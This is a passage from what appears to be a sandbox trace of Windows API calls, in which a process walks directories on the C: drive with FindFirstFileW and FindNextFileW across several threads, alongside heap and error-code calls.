| out: hHeap=0x8c0000) returned 1 [0065.473] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.473] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f31b0 [0065.473] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.473] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.475] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.475] FindClose (in: hFindFile=0x2f31b0 | out: hFindFile=0x2f31b0) returned 1 [0065.475] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.475] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.475] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f31b0 [0065.475] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.475] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.477] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.477] FindClose (in: hFindFile=0x2f31b0 | out: hFindFile=0x2f31b0) returned 1 [0065.477] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.477] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f31b0 [0065.477] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.477] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.479] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.479] FindClose (in: hFindFile=0x2f31b0 | out: hFindFile=0x2f31b0) returned 1 [0065.479] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.480] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f31b0 [0065.480] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.480] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.484] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.484] FindClose (in: hFindFile=0x2f31b0 | out: hFindFile=0x2f31b0) returned 1 [0065.484] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.484] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f31b0 [0065.485] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.485] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.486] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.486] FindClose (in: hFindFile=0x2f31b0 | out: hFindFile=0x2f31b0) returned 1 [0065.486] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.486] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f31b0 [0065.487] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.487] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.488] FindNextFileW (in: hFindFile=0x2f31b0, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0 [0065.488] FindClose (in: hFindFile=0x2f31b0 | out: hFindFile=0x2f31b0) returned 1 [0065.489] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd67a60 | out: hHeap=0x8c0000) returned 1 [0065.489] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 0 [0065.489] FindClose (in: hFindFile=0x2ebd30 | out: hFindFile=0x2ebd30) returned 1 [0065.489] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd57a58 | out: hHeap=0x8c0000) returned 1 [0065.489] FindNextFileW (in: hFindFile=0x2ebcf0, lpFindFileData=0x11ff710 | out: lpFindFileData=0x11ff710) returned 1 [0065.490] FindNextFileW (in: hFindFile=0x2ebcf0, lpFindFileData=0x11ff710 | out: lpFindFileData=0x11ff710) returned 1 [0065.490] FindNextFileW (in: hFindFile=0x2ebcf0, lpFindFileData=0x11ff710 | out: lpFindFileData=0x11ff710) returned 1 [0065.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 0x2ebd30 [0065.490] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.490] FindNextFileW (in: hFindFile=0x2ebd30, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 0 [0065.490] FindClose (in: hFindFile=0x2ebd30 | out: hFindFile=0x2ebd30) returned 1 [0065.490] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd57a58 | out: hHeap=0x8c0000) returned 1 [0065.490] FindNextFileW (in: hFindFile=0x2ebcf0, lpFindFileData=0x11ff710 | out: lpFindFileData=0x11ff710) returned 1 [0065.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 0xffffffff [0065.591] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd57a58 | out: hHeap=0x8c0000) returned 1 [0065.591] FindNextFileW (in: hFindFile=0x2ebcf0, lpFindFileData=0x11ff710 | out: lpFindFileData=0x11ff710) returned 1 [0065.592] FindNextFileW (in: hFindFile=0x2ebcf0, lpFindFileData=0x11ff710 | out: lpFindFileData=0x11ff710) returned 1 [0065.592] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 0x2efd38 [0065.592] FindNextFileW (in: hFindFile=0x2efd38, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.592] FindNextFileW (in: hFindFile=0x2efd38, lpFindFileData=0x11ff48c | out: lpFindFileData=0x11ff48c) returned 1 [0065.592] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 0x2f41b8 [0065.629] FindNextFileW (in: hFindFile=0x2f41b8, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.630] FindNextFileW (in: hFindFile=0x2f41b8, lpFindFileData=0x11ff208 | out: lpFindFileData=0x11ff208) returned 1 [0065.630] FindFirstFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x11fef84) Thread: id = 54 os_tid = 0xaa4 [0065.283] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x38) returned 0x8c1620 [0065.284] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x18) returned 0x8c5480 [0065.284] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x130 [0065.284] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x134 [0065.284] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x138 [0065.284] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xd77a68 [0065.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1243957, lpParameter=0x2c6f888, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c [0065.285] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1243957, lpParameter=0x2c6f888, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x140 [0065.286] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xd87a70 [0065.286] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x2c6f600 | out: lpFindFileData=0x2c6f600) returned 0x2e84c0 [0065.286] GetLastError () returned 0x0 [0065.286] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x214) returned 0x8cc4f0 [0065.287] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0065.287] GetCurrentThreadId () returned 0xaa4 [0065.287] SetLastError (dwErrCode=0x0) [0065.287] GetLastError () returned 0x0 [0065.287] SetLastError (dwErrCode=0x0) [0065.287] GetLastError () returned 0x0 [0065.287] SetLastError (dwErrCode=0x0) [0065.287] GetLastError () returned 0x0 [0065.287] SetLastError (dwErrCode=0x0) [0065.287] GetLastError () returned 0x0 [0065.287] SetLastError (dwErrCode=0x0) [0065.287] GetLastError () returned 0x0 [0065.287] SetLastError (dwErrCode=0x0) [0065.287] GetLastError () returned 0x0 [0065.287] SetLastError (dwErrCode=0x0) [0065.287] GetLastError () returned 0x0 [0065.288] SetLastError (dwErrCode=0x0) [0065.288] GetLastError () returned 0x0 [0065.288] SetLastError (dwErrCode=0x0) [0065.288] GetLastError () returned 0x0 [0065.288] SetLastError (dwErrCode=0x0) [0065.288] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xd97a78 [0065.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 0x2e8500 [0065.288] FindNextFileW (in: hFindFile=0x2e8500, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.288] FindNextFileW (in: hFindFile=0x2e8500, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.288] GetLastError () returned 0x0 [0065.289] SetLastError (dwErrCode=0x0) [0065.289] GetLastError () returned 0x0 [0065.289] SetLastError (dwErrCode=0x0) [0065.289] GetLastError () returned 0x0 [0065.289] SetLastError (dwErrCode=0x0) [0065.289] GetLastError () returned 0x0 [0065.289] SetLastError (dwErrCode=0x0) [0065.289] GetLastError () returned 0x0 [0065.289] SetLastError (dwErrCode=0x0) [0065.289] GetLastError () returned 0x0 [0065.289] SetLastError (dwErrCode=0x0) [0065.289] GetLastError () returned 0x0 [0065.289] SetLastError (dwErrCode=0x0) [0065.289] GetLastError () returned 0x0 [0065.289] SetLastError (dwErrCode=0x0) [0065.289] GetLastError () returned 0x0 [0065.289] SetLastError (dwErrCode=0x0) [0065.289] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xda7a80 [0065.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2e8540 [0065.290] FindNextFileW (in: hFindFile=0x2e8540, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.290] FindNextFileW (in: hFindFile=0x2e8540, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.290] GetLastError () returned 0x0 [0065.290] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.291] SetLastError (dwErrCode=0x0) [0065.291] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.292] GetLastError () returned 0x0 [0065.292] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.293] SetLastError (dwErrCode=0x0) [0065.293] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.294] GetLastError () returned 0x0 [0065.294] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.295] SetLastError (dwErrCode=0x0) [0065.295] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.296] GetLastError () returned 0x0 [0065.296] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.297] SetLastError (dwErrCode=0x0) [0065.297] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.298] SetLastError (dwErrCode=0x0) [0065.298] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.299] SetLastError (dwErrCode=0x0) [0065.299] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.300] SetLastError (dwErrCode=0x0) [0065.300] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] GetLastError () returned 0x0 [0065.301] SetLastError (dwErrCode=0x0) [0065.301] SetEvent (hEvent=0x134) returned 1 [0065.302] ResetEvent (hEvent=0x138) returned 1 [0065.302] FindNextFileW (in: hFindFile=0x2e8540, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.302] FindClose (in: hFindFile=0x2e8540 | out: hFindFile=0x2e8540) returned 1 [0065.302] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xda7a80 | out: hHeap=0x8c0000) returned 1 [0065.302] FindNextFileW (in: hFindFile=0x2e8500, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 0 [0065.302] FindClose (in: hFindFile=0x2e8500 | out: hFindFile=0x2e8500) returned 1 [0065.302] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd97a78 | out: hHeap=0x8c0000) returned 1 [0065.302] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x2c6f600 | out: lpFindFileData=0x2c6f600) returned 1 [0065.302] GetLastError () returned 0x12 [0065.302] SetLastError (dwErrCode=0x12) [0065.302] GetLastError () returned 0x12 [0065.302] SetLastError (dwErrCode=0x12) [0065.302] GetLastError () returned 0x12 [0065.302] SetLastError (dwErrCode=0x12) [0065.302] GetLastError () returned 0x12 [0065.302] SetLastError (dwErrCode=0x12) [0065.302] GetLastError () returned 0x12 [0065.302] SetLastError (dwErrCode=0x12) [0065.302] GetLastError () returned 0x12 [0065.302] SetLastError (dwErrCode=0x12) [0065.302] GetLastError () returned 0x12 [0065.303] SetLastError (dwErrCode=0x12) [0065.303] GetLastError () returned 0x12 [0065.303] SetLastError (dwErrCode=0x12) [0065.303] GetLastError () returned 0x12 [0065.303] SetLastError (dwErrCode=0x12) [0065.303] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xd97a78 [0065.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 0x2ed828 [0065.388] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.388] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.388] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.388] GetLastError () returned 0x12 [0065.388] SetLastError (dwErrCode=0x12) [0065.388] GetLastError () returned 0x12 [0065.388] SetLastError (dwErrCode=0x12) [0065.388] GetLastError () returned 0x12 [0065.388] SetLastError (dwErrCode=0x12) [0065.388] GetLastError () returned 0x12 [0065.388] SetLastError (dwErrCode=0x12) [0065.388] GetLastError () returned 0x12 [0065.389] SetLastError (dwErrCode=0x12) [0065.389] GetLastError () returned 0x12 [0065.389] SetLastError (dwErrCode=0x12) [0065.389] GetLastError () returned 0x12 [0065.389] SetLastError (dwErrCode=0x12) [0065.389] GetLastError () returned 0x12 [0065.389] SetLastError (dwErrCode=0x12) [0065.389] GetLastError () returned 0x12 [0065.389] SetLastError (dwErrCode=0x12) [0065.389] GetLastError () returned 0x12 [0065.389] SetLastError (dwErrCode=0x12) [0065.389] GetLastError () returned 0x12 [0065.389] SetLastError (dwErrCode=0x12) [0065.389] GetLastError () returned 0x12 [0065.389] SetLastError (dwErrCode=0x12) [0065.389] GetLastError () returned 0x12 